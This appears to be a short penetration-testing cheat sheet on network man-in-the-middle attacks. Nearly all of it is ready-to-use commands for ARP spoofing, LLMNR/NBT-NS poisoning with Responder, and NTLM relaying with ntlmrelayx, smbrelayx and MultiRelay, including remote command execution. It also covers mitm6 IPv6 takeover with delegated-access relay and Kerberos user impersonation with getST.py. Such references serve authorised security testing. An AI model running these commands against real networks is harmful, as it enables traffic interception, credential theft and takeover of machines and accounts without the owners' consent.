Man-in-the-Middle
ARP Cache Poisoning
Bettercap2
arp.spoof on
Arpspoof
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
LLMNR/NBT-NS Poisoning and SMB Relay
Responder
Remember to start with
SMB = Off # Turn this off
HTTP = Off # Turn this off
responder -I eth0 -rv
responder -I eth0 -r -d -w
Relay
ntlmrelayx
cme smb <CIDR> --gen-relay-list targets.txt
ntlmrelayx.py -tf targets.txt
smbrelayx
smbrelayx.py -h <target_IP> -c "ipconfig"
MultiRelay
python MultiRelay.py -t <IP target> -u ALL
mitm6
mitm6 -d example.local --ignore-nofqdn
Relay
ntlmrelayx.py -6 -t ldaps://example.local --delegate-access --no-smb-server -wh test-wpad
Exploit
getST.py -spn cifs/example.local example.local/ADDED_PC\$ -impersonate TARGET_USER
InveighZero
Works from Windows systems:
Last updated
Was this helpful?